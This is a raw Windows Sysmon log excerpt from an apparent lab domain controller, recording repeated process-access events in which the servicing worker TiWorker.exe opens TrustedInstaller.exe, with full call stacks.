12:02:25.169{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.169{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.122{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.122{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.122{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.122{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.107{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.107{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 